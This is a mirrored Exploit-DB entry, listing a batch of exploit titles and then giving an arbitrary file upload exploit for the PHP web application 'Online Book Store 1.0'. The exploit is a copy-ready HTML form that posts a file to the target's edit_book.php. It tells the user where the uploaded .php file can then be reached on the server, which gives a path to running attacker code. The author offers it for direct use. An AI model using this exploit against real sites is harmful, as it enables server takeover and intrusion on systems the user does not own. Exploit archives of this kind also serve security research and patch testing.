exploit-db-mirror/exploits/php/webapps/47928.txt
Offensive Security 1a9ce31a5f DB: 2020-01-17
12 changes to exploits/shellcodes

SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate
Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)

Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution

VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities

ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting

ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting

VICIDIAL Call Center Suite - Multiple SQL Injections

Online Book Store 1.0 -  'bookisbn' SQL Injection
WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection
Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
Online Book Store 1.0 - Arbitrary File Upload
Tautulli 2.1.9 - Denial of Service ( Metasploit )
Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection
Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
2020-01-17 05:02:10 +00:00

22 lines
No EOL
1.1 KiB
Text

# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-01-16
# Exploit Author: Or4nG.M4n aka S4udiExploit
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: MY MIND v1.23.45
# CVE: N/A
# WWW . SEC4EVER . COM
-> hola amigos ^.^
-> just copy this html code
<form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
<td><input type="file" name="image"></td>
<input type="submit" name="save_change" value="Change" class="btn btn-primary">
</form>
-> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
# i think am back %^_^%
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
# big thanks to Stupid Coder ^.^